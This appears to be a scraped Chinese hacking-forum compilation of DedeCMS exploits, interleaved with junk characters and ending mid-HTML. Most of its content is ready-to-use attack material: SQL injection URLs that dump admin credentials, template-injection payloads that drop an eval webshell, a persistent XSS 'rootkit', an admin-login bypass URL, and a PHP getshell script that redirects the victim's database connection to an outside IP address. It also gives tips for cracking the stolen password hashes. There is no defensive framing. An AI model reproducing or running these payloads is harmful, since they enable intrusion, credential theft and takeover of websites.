|
|
0 W2 a4 Y. b7 L% u1 x
Dedecms 5.6 rss注入漏洞' p3 K1 m8 \! L/ _ c9 H
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
- d6 [0 \& U! l5 K$ A( K# k% R
: o; W7 {1 O- e6 R. S5 q7 E. R" H. |" d( w
2 O; B l/ @0 {, s3 f& S+ ^; }, }" w: g2 \9 j' p( Y
4 _ X A7 T$ C' A
# F9 W& X* O6 g- P* q! V
; N7 R0 w2 a- V6 z1 R G8 c
+ m& V, K. K1 f; VDedeCms v5.6 嵌入恶意代码执行漏洞
0 u4 l$ h& A K5 S$ S' d注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
4 F- o% `( [" S发表后查看或修改即可执行
0 a$ S& P9 V( l' ~a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}6 W; M. Y$ V1 l) d; k6 U
生成x.php 密码xiao,直接生成一句话。6 A* e# F4 |9 B# l
- z/ ?+ @: `1 T) Q( Z- {0 P: e
$ n; x, [& J$ ? Y K* y1 \6 E4 r) ] m1 C# U$ r- o. r
" r W. ^2 ^/ N* n% U6 S
9 ^, \5 h+ p k4 c; v. J' k2 z! Z- s+ N' v6 y( Y0 y
) \/ p, G% k) C" a. M
( ]3 ?5 n+ c) ~" I; A0 ^, n
Dede 5.6 GBK SQL注入漏洞# }1 x1 `* J. E, P, \ _! r
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';8 M$ P, E. t/ i4 A
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
$ u0 k4 c9 L4 o/ [http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7) W5 c, @! Q( J: \& y
/ G \3 A$ ~9 ^% Q" l
5 p; J3 z) ?6 C+ ]) i9 Z1 \2 i+ H2 i* ?7 ?6 o, `) D
4 @0 u5 m/ i3 }( z. F) z9 g
. E/ j" _% D- m
7 A1 x6 f& p/ l+ T7 o8 j4 e. l6 W
; E. S3 Q7 d0 d+ J7 {
, C) C* j- ~6 h1 C
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
0 ~3 K2 r! m9 L* k( c$ h( _/ rhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
2 G% _* f# q- y' m) n: D8 T
. `5 u! ?$ z4 A; p" P* P _# Y, k# j X k y0 |& Q9 W
7 T- q$ V2 L0 `1 T% X
* u, U. L8 Q# C" P4 _" Y" @- Y' h; Y% R" y+ _2 ~$ v
# ~$ s# g6 b& j% D. \! j8 X) M3 e
DEDECMS 全版本 gotopage变量XSS漏洞+ U1 l3 B" y6 `' a3 d0 l
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
4 S4 q3 s J9 Jhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
( c" x/ v: [ F5 J* t( d) b$ \2 n2 M
4 ]8 d; c+ t# B3 t! B6 N6 g2 z8 E% N G- d9 \, y2 ^3 W3 w6 l
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 1 N4 H) ]% d9 z# M. Q
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda5 ^+ G T5 D& f. ?3 [* F: c, `
+ R% u; w( A3 U ^/ p6 W3 L- t& t) b, [- F
http://v57.demo.dedecms.com/dede/login.php
. s3 n, u+ M3 s) {' h( s& B: l3 J
1 M" Z g: a4 L" I: B1 M7 `color=Red]DeDeCMS(织梦)变量覆盖getshell3 V: `/ ~' i/ ~: t& M2 K9 p
#!usr/bin/php -w3 ~! X9 c/ D: e$ _- l0 G1 W: `
<?php
' T# J3 N5 m' G+ U( g7 \error_reporting(E_ERROR);
) J2 K( b# G; c: \4 D+ J4 dset_time_limit(0);% J' b) a5 h6 Y; N/ y; j h
print_r('' X4 }; E2 M: s( K$ [1 @
DEDEcms Variable Coverage
) @0 T( p* J% D0 R1 ?Exploit Author: www.heixiaozi.comwww.webvul.com
1 T: K; i! O( Y) D# p! B);$ ^, m4 r% m8 b8 ~) E
echo "\r\n";$ i9 s- O' |" T* g4 g4 w% @/ p
if($argv[2]==null){" c& d, J; `: p# U' i. N) |0 r6 y
print_r('
- W* V# q# k0 Z6 }) s* D1 `+ F* r5 \+---------------------------------------------------------------------------+
" ?$ |# t/ ` A3 }- _Usage: php '.$argv[0].' url aid path& T; A+ v4 H V
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/* n) [% K* G. O0 e
Example:
- m' ?. C2 x4 p. c' ophp '.$argv[0].' www.site.com 1 old5 b& a! u6 {. E4 D& t6 F
+---------------------------------------------------------------------------+
+ h* ?8 S) n, G" S0 U');
3 a8 g! G$ |$ Lexit;
4 T( z3 e! l* C}
) P" z5 P: H" @0 V0 ~9 S$url=$argv[1]; B) ]; q) e; Z7 t2 q
$aid=$argv[2];! O- V5 ~3 [$ J; }6 U
$path=$argv[3];
& v* t' Y6 u ]) d ]4 h; [$exp=Getshell($url,$aid,$path);
0 w6 O# U8 j, J+ xif (strpos($exp,"OK")>12){
) q+ i) d a' M3 I1 wecho "
) ]7 I! r7 r4 I. s" z, _; ~/ CExploit Success \n";; f- _5 h, l/ N D2 W# y
if($aid==1)echo "
# X* Q/ `( Y& i' D- UShell:".$url."/$path/data/cache/fuck.php\n" ;, C- z$ m) e& G, }
7 c; J9 p4 j3 s- P7 c- y8 _" g
9 o5 q+ A% J, ]
if($aid==2)echo "
- B' P) f% k' f. _$ e9 BShell:".$url."/$path/fuck.php\n" ;
$ [. |6 ]: S" w; } {4 n8 V& }! |. s' N' |/ ]# k" V
# r+ ~8 r) G* r8 h9 X6 @if($aid==3)echo "/ W _4 h6 a. d
Shell:".$url."/$path/plus/fuck.php\n";
+ |0 l% x* C& x1 c# m- S
+ Y$ u0 w* J' B) ~' B" R1 n$ \. ^$ s7 \/ p6 k8 o2 u
}else{
; M, U; A7 ~' @& r; Uecho "% Y+ h# N* }: u
Exploit Failed \n";/ c+ m& \3 |4 F/ q" @. v
}, h$ f/ i5 ]/ G: O3 y( f, Y
function Getshell($url,$aid,$path){
1 _ Z2 ^% M" t/ N: M/ u$id=$aid;
& Q# u( i/ S& k# \$host=$url;
" V. S* C @: Y& W" n' G$port="80";' M# W2 e3 x$ m
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
\* ^# N0 \: Y! R$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";- M p2 m- E$ \$ [- ^+ P
$data .= "Host: ".$host."\r\n";
; ~# A" U ~) Q! M$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
; U3 M) L0 Q, E7 o: `: J$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";. I) ]0 E, I8 ^4 n) N9 N" A
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
; z6 q0 V4 G2 ^+ \% C//$data .= "Accept-Encoding: gzip,deflate\r\n";' n% k. Z2 Q5 j* i
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";9 Q5 o# i0 c- b- k
$data .= "Connection: keep-alive\r\n";
9 R1 a" E7 i9 A5 h" P6 I) [$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
" v1 u* O2 v5 ?$ V; [* G$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
/ k8 Y: M/ U+ N9 D. I& e$data .= $content."\r\n";
9 `! _0 d+ q: O7 Q$ock=fsockopen($host,$port);, n" T8 o* P; i$ y# z4 N
if (!$ock) {
$ r5 S' @: v$ N& mecho "
- Z& ~6 B/ e- R7 f1 F9 H$ @No response from ".$host."\n";
9 i5 }+ Q* R4 @7 ^6 n! l& A; m) ?% y}
! k3 S7 M: a7 r5 Wfwrite($ock,$data);
# L# x9 i' J* C6 q; ~, @while (!feof($ock)) {, F0 N$ u$ i- e. n
$exp=fgets($ock, 1024);
$ U. T2 g: _# K8 |$ o4 Breturn $exp;
+ @: G. l' ?3 V Y}
Y8 [5 t: Z, j: Q}
' C6 E& u+ [( E& U! K4 T! I+ b& F$ X& s1 _
& q, t! D1 w! }+ C- l/ M6 ?' u
?>
5 B4 ~# @4 Z3 F1 z/ W1 C; h6 D1 g7 X
0 r: m7 ?5 T/ S2 k" T' k2 \, I' {, y1 o Y
8 J3 r# L- A' V. d
$ A( @& ^7 V6 X2 B# W' @3 _
* ^3 j6 T1 ?& y, \' l
6 ?8 J5 `0 z) Z% }
$ _8 n: Y" d% Z3 _
5 ?) N) s5 t4 A( q+ @+ E& b5 E3 Z0 J# e* P- }
5 s5 y* U5 [9 f1 k. X& e
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)0 g& z0 g- ?- F. K3 M+ q8 O/ l1 R
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
) P8 S [8 F& |" q
( g5 h2 x3 D3 l! P' ^8 k3 B" t. w! ^ v6 Q- [) t$ w
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
) Y" s, e' q; Y9 J/ h: |" w5 D
6 C) j9 `8 T( n: _4 S; T- i4 N
! L# m7 W8 r6 t) Y4 L9 n此漏洞的前提是必须得到后台路径才能实现8 @1 w1 J# H6 \/ |- J" q
$ C j, E7 o( H0 z+ q" T4 }3 x
) Z0 z- z! X- w1 A9 Z: y, @
& X$ G& e6 e1 h2 `0 X, e% X9 @
6 H! l5 P; m$ R) |$ Y% S7 F4 y$ K1 {5 S7 E4 h
8 Q8 v8 \- n7 K- C3 q
$ L0 C. v. T1 N
3 a; _3 U, U4 ]( x; P% `- i
* n! S6 X* H$ C2 l6 `- ~; q' I
# `6 X' V- f$ R7 \( f9 YDedecms织梦 标签远程文件写入漏洞
0 p9 X( d% F& E/ M前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
( Y5 U2 h a& L/ u [2 X! D# ]3 h' j
, A* ?9 o; V d8 I0 Z* f( l
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 - \, D4 s; {/ B
<form action="" method="post" name="QuickSearch" id="QuickSearch">
0 F; e3 l8 n* n( _4 \- O& L<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />8 D0 r0 G" U# A/ @3 Y% u. B
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />+ |4 U# l) |: Q/ _7 L: I5 ?
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />9 q' Q0 L1 d3 |# R
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
$ X. x b. ~* j9 H% _<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
( ^5 X( R6 i7 K% Q<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
+ y2 j. `; J. t* }# d8 [0 J<input type="text" value="true" name="nocache" style="width:400">. f. F1 W8 T$ X$ O7 K4 U( ^: {
<input type="submit" value="提交" name="QuickSearchBtn"><br />; S9 N2 X0 U; {6 C
</form>0 {" `5 p+ J0 ~% u: z4 O4 J7 f% A& K
<script>
$ g2 q& r/ z8 ^4 Z# A( _6 |function addaction()/ X+ K4 X. Q: G9 S& a3 t9 E* N
{1 T$ Q' ~" b4 d3 q( @! {, B
document.QuickSearch.action=document.QuickSearch.doaction.value;
3 G, `* p5 q r4 y) c6 s& Y}! Q" o- J+ d9 A" |/ U- Y6 S
</script>& v$ D" F" L& B+ T; y* W8 h+ h$ V
+ S6 f3 h% D8 n1 B: G. t
1 v- D0 _3 I. s: X6 B0 y9 c
6 @% K: e+ ^1 Q+ o7 u+ b: v5 Z8 v+ F$ a; d- q( i
5 w; p; H8 w* c$ t* Q* u
4 ^# x8 E- Z7 Z% d+ W: K
2 k* }& r9 J. _' d; y; a
+ o7 x" T( I: ^- ~0 |+ L
. I" m9 p4 ]' ~# q! G0 ^: m9 u
C9 m$ l1 S1 X* J2 B+ nDedeCms v5.6 嵌入恶意代码执行漏洞
* o) D/ Z4 M& O% R0 _; m2 X0 q0 x& j注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行- b. L: ?0 a" G
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
/ Q/ F! `4 R% Z" e- B) s生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
8 A' O1 q7 k1 l. U6 z) L6 WDedecms <= V5.6 Final模板执行漏洞
# n5 U9 p0 @, p/ k注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:5 r- A8 n) a @! _1 k, Z$ [
uploads/userup/2/12OMX04-15A.jpg' T! n3 w" s& o+ {: K5 F
6 L2 E. P5 k6 t+ l& ]% J
$ o0 S6 n! a, `模板内容是(如果限制图片格式,加gif89a):
7 N* A ]7 `7 u7 @, V{dede:name runphp='yes'}+ @. ^' E8 S; q5 t, W
$fp = @fopen("1.php", 'a');
3 P6 L' `' [: M: Z: g" P! b( k@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");4 ]/ ~' V) h# C
@fclose($fp); S/ T0 [" G- F9 E2 Y8 m' [
{/dede:name}
, Q0 k; P$ o& ^7 b2 修改刚刚发表的文章,查看源文件,构造一个表单:
" [# p0 p$ j; ]. B& x5 g! a) Y8 @<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">" ~4 {3 {; I' A! F$ o6 L
<input type="hidden" name="dopost" value="save" />8 |" P; {' @6 M# v# F
<input type="hidden" name="aid" value="2" />
$ O0 O$ T4 q- e+ G; G8 H- N<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
9 j' y! l$ ]) R+ x<input type="hidden" name="channelid" value="1" />
) a" c* u a8 z) z! s, h<input type="hidden" name="oldlitpic" value="" />8 B, d; F$ [& M2 v# H8 K
<input type="hidden" name="sortrank" value="1275972263" />( @5 e9 R8 j* S9 S" @6 p4 T
3 T: H8 V! ?* @6 D; @) j6 I2 k
. q3 J2 w" p0 t7 [& E<div id="mainCp">; k K0 Y4 G- U4 d, y, e8 B
<h3 class="meTitle"><strong>修改文章</strong></h3>0 I5 u, T7 R6 U% G! L: q" r5 A2 t
) u% T7 H8 C# ?/ Z- W0 G
4 Z6 K, }8 J$ k8 C5 Z/ C; o<div class="postForm">
3 Z2 P" |2 h& z, `# N, I+ A<label>标题:</label>
8 ?5 P# |& G: h9 k4 n, D<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
% P/ U1 } B3 K
/ b. m5 P) n" o
8 q- \7 W* U- v" b1 S" K<label>标签TAG:</label>. x; ?+ S5 ?: x: V5 J
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开) e! T0 {; B( e$ O5 Q' O4 E
/ X, _$ q2 w0 c& ^; Y& A
9 c7 Z) F" l+ C/ V5 \<label>作者:</label>/ k" G/ ]8 |% ]2 Y
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/> G) u3 V) W& f ~
% M# I# N# D) d+ S
) y* g6 S; T/ D$ O9 H- l<label>隶属栏目:</label>
2 e% i* o3 h- e/ U; v<select name='typeid' size='1'>) e0 o( _ n% `) l
<option value='1' class='option3' selected=''>测试栏目</option>
$ [% {/ A4 g7 E7 U3 X! k</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)- v/ E# J/ V: j
, Y7 z- w8 h. C* [4 e; w6 F' v/ ~: S2 I, q- o
<label>我的分类:</label>& `/ z2 R; s, M8 [9 s' P2 s0 L I
<select name='mtypesid' size='1'>3 ?8 [% p! i& x/ h4 P5 x3 _7 C: O0 y k
<option value='0' selected>请选择分类...</option>
4 Y1 t3 F3 r7 b- }# u3 \. K5 Z$ p) v<option value='1' class='option3' selected>hahahha</option>
7 @1 y# t1 u' E& j</select>
* Y8 Y0 `3 z* f* I% V
: y* S$ R8 v" T6 {( p' J9 Q! B, v1 R9 Y! o6 d
<label>信息摘要:</label>1 R/ E' d6 M+ o# _
<textarea name="description" id="description">1111111</textarea>
8 f' |3 Z" a2 r( K" d4 ?% n(内容的简要说明)% l8 ]( a; y; s) o9 x9 \! t/ k
7 c$ V2 k/ R$ U. D: ]0 D" B
' s! G6 ]" }# X& f
<label>缩略图:</label>4 f- O% w6 U3 U6 c( L
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
4 i2 m8 y4 R# W8 p2 u9 c5 z0 @# l0 l, |0 a( z$ O+ Q
7 @/ Y1 E7 T- A! h; z V* O6 G
<input type='text' name='templet'
% b+ T, }6 S3 |4 H- ivalue="../ uploads/userup/2/12OMX04-15A.jpg">
! V @0 A. P5 `/ P2 R$ f; R<input type='text' name='dede_addonfields'6 [' |! w6 @9 S
value="templet,htmltext;">(这里构造)
& A3 P r1 \) L</div>
8 y @ y. ?- K
" M6 o* l, x, N p% q1 f* H
$ \. e: q( I, i1 a0 `: B<!-- 表单操作区域 -->5 I- G- @$ }: d/ H- L( U2 R
<h3 class="meTitle">详细内容</h3>
: P0 Y4 s' S/ Y. Y; b5 ?
( |1 V# t0 X- g9 R! R& A+ X3 O) T
u: ^ q; ?- U- C<div class="contentShow postForm">, D1 {; M" v! k+ i$ ^
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
" P( M/ Z4 S& s, I1 \8 Z9 e& F, N" v8 O3 C
2 ?+ W* r5 c6 T! v
<label>验证码:</label>( c" G! ]+ \8 B% I# t* f
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />) h; q, F; `! i3 `5 @/ e
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
- D* G/ `+ E6 B! ^% l( y I* O b& w8 `5 R3 x
- E+ N8 u5 a& M% e" |<button class="button2" type="submit">提交</button>" U- z9 |. M2 E/ K. c
<button class="button2 ml10" type="reset">重置</button>& @: p. K9 Z( Z7 X% M0 h6 N
</div>
" {" V1 h) E0 T9 A) F" b8 s$ ]6 `7 B2 N
2 ?, J! }) M# ^
</div>
, d# |& S N. R
& |& h b0 y6 O2 K6 ~1 l2 u. }7 R0 m! W3 B7 j7 X. z; i
</form>
% V) O3 W; H; h) S, a+ ^0 V9 o2 @) _; v5 s
J! i; i0 @% U, v) d) H提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
: W+ ^6 B$ u7 l+ E假设刚刚修改的文章的aid为2,则我们只需要访问:$ r6 R/ A, G& U) L
http://127.0.0.1/dede/plus/view.php?aid=23 e4 H0 [/ v2 [ M
即可以在plus目录下生成webshell:1.php1 a- Q$ {1 @1 B% ~* o
: @* d- ?+ `$ e/ G" ?/ E4 C
( b- E5 B) e+ D+ I# p j2 F4 x3 w6 f$ j& w9 C. p, ^
. r. y0 {2 D) H: d
3 A, F( A! H0 `. `, K- o8 l; I3 `
* C% {% r) d5 [6 N L* x
# q4 V% ~4 y* n p: b# }7 B; @* G( _8 U1 @1 ~
3 i) @' W/ N. p- F4 D' Y, J# K- C2 Z
. J: X- T" h; z
* c% g3 o, ]0 `5 o
& t a6 D1 d9 ~- g' o
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)6 P6 t2 b) N3 l
Gif89a{dede:field name='toby57' runphp='yes'}
& P& [8 [/ ^! o3 u0 ?$ sphpinfo();; j- j9 K$ S: B$ e
{/dede:field}7 k3 g6 H' B9 Z. [, F" v
保存为1.gif) }& j! J; g& ]; E5 I8 Y% L+ X7 d
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
' X S$ V; E' {4 K4 P! w! ?3 g8 R<input type="hidden" name="aid" value="7" /> - r; I. t) e: q/ C3 E' e' [( Y
<input type="hidden" name="mediatype" value="1" />
9 t X/ B" K4 v1 S# B<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> * Z& Z( v0 s5 E. P5 d k
<input type="hidden" name="dopost" value="save" /> " s( I- ]2 J, Q9 B
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
$ _! j. N4 u* `: S, U$ W( e& c<input name="addonfile" type="file" id="addonfile"/>
8 E F$ k t, o" q6 F# o<button class="button2" type="submit" >更改</button> - F; {/ ^' x+ g; C# N3 [! f1 h
</form>
0 D3 |" f4 b6 ?, ^. O+ r Q! X/ o* J! K! H [
+ r& `- @0 ]2 u
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
( O2 b; I2 [6 Z发表文章,然后构造修改表单如下:
' w7 H$ P2 v" L) c5 y2 j6 U9 ~( ]& h `+ l6 P
4 k9 s8 D1 Y5 v% C5 i<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> & B4 ?, y% C% {) `/ _
<input type="hidden" name="dopost" value="save" /> : I: \) ]. d0 P' j* ?
<input type="hidden" name="aid" value="2" /> 8 C, \( U; y, X
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
9 ?2 F' Q, ]2 y/ k$ M- p<input type="hidden" name="channelid" value="1" /> ) g9 T, h7 X# [3 I3 z7 T1 ~
<input type="hidden" name="oldlitpic" value="" /> . H, S0 m+ _7 f4 e% Q6 o w
<input type="hidden" name="sortrank" value="1282049150" /> ) U# I1 P! |. }
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> 7 @) a \, N5 C6 W5 W4 R: o6 X
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
. N8 @+ o/ N; w1 P1 j<select name='typeid' size='1'>
$ Z1 S+ ^. F. v7 N<option value='1' class='option3' selected=''>Test</option>
+ \/ D. M4 P0 ?$ ~<select name='mtypesid' size='1'>
. Y& E3 @9 R* B& l<option value='0' selected>请选择分类...</option>
" y* t/ r) Y/ i% m' \<option value='1' class='option3' selected>aa</option></select>
) F) L( w- K; X. F/ l<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> , Y' M$ `+ k/ Y0 f# @4 ]4 p
<input type='hidden' name='dede_addonfields' value="templet"> 9 \7 J: H" G8 m: ?' S) A' C
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> 8 [9 i% |2 e* v6 n
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
! _, n; }$ x' A& u. \/ W0 m; a<button class="button2" type="submit">提交</button> ; u- Y ?# a9 H2 `
</form>
7 ]% f7 x& r( D5 @* m7 v* z5 Z, F' {0 R3 t5 N6 i6 n/ Q! b$ G
. S2 E2 P- o9 t G! l# F3 P
% ^- _) ~. B3 _% H3 R2 u |8 `$ X/ w* u" S9 T; _- B! R' L
" F! ~6 w/ w+ G% w
$ ^6 M( E6 S2 q: z/ R
" B/ r- j; ?# M* v+ ^! w$ }
) ~4 G6 L+ b4 n
' N7 N* Z8 ]% V0 C2 a6 L8 D4 z# w' k6 r) B) J# Y8 f
: t8 w: D0 u+ G: h
, p- ]# c8 U( P1 o
织梦(Dedecms)V5.6 远程文件删除漏洞1 f$ z! e4 x% p; A
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
) C G$ r' b K# F/ t, {8 H; W- C8 V/ Q* A9 K
+ D$ k1 M6 Q$ I" U2 D" g3 C
' q3 N' s. n2 @* J( G/ J+ k; c9 w
5 d; r! Z# \4 d: N& t; b6 g& z+ o% z# [6 D' t. I! A
4 c" h/ L* x$ y- B
6 c+ J' `! t9 ?* \4 @
9 h P1 `: y# n A
+ O' j' }- Y9 g/ k1 X0 @: y
( k3 m$ w; o6 u织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 2 Z2 `# j C+ {- @1 q: L" s+ i3 v, Q
http://www.test.com/plus/carbuya ... urn&code=../../! |3 u. k, n; h9 b# E
" U3 V6 T L3 p
3 ?& y" ]0 o% B1 H0 v7 m) i3 E, q! l# E
$ ~ }8 v* p1 t
. j6 @ ?- `$ t2 x, Z W- m" I
0 I- m2 P, h) U- m9 P2 S; N! @+ Z8 z$ B9 u5 T {, h
. ?5 a4 }5 |' v
1 C& A: |+ V b: G6 `
% i( \0 W$ R8 pDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
8 R8 J3 Y3 _% `7 G' k9 gplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
, A8 e( h) a5 v7 y; O3 e* P. @7 L密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD56 C- K" n; Y4 f0 S5 u! A
0 ~5 f0 c: M8 ?2 U- L! s
& P+ g) u, R$ G7 M: d
9 l4 _( F6 i9 g2 A& l: u& U3 I: P: H, e; ^
1 e% j, O/ r3 B; o0 T1 i
- s$ X- r" h- u0 A6 o4 o+ m
' F9 W. w4 M5 F' y
$ n o) Y \- S G0 a" |: r# k
) j: X1 M' B7 B# E3 {/ p& ]+ D+ V
/ W) B( G+ S! Z$ G* m; ?) n# v织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
$ O; C( v% U) P# `* U g" Uhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
+ b5 \4 p: H6 G' E0 b
( s2 `2 y6 v( l R
8 v# y0 g* D- W
9 O0 _' z1 Y0 F) T! I7 C5 q- E- t# W8 T+ g4 I: s. ]( i- }$ x* s
# O8 D% Q; Z+ L. t" h7 p9 D# n
/ T4 c( T# q5 ~- n% m w1 n
+ `8 @6 @8 v5 P# ` Y% B. j
3 M+ |% X4 M* k- @2 D9 w1 _0 i# ~, }7 w) w+ E* j
7 [2 f# k4 g" K$ q
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
1 Q* Z* i; c" o/ i+ Y* a$ }# f<html>
! d0 ]6 u$ G. _# m) P<head>
